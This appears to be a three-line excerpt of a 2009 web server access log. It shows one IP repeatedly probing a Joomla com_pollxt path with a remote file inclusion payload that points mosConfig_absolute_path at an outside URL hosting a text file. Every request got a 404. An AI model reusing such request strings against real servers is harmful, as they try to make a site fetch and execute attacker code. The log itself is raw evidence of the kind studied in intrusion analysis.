209.97.212.185 - - [16/Oct/2009:06:41:45 -0500] "GET /logs/access_log.1243641600//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
209.97.212.185 - - [16/Oct/2009:06:41:45 -0500] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
209.97.212.185 - - [16/Oct/2009:06:41:45 -0500] "GET /logs/access_log.1248480000//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
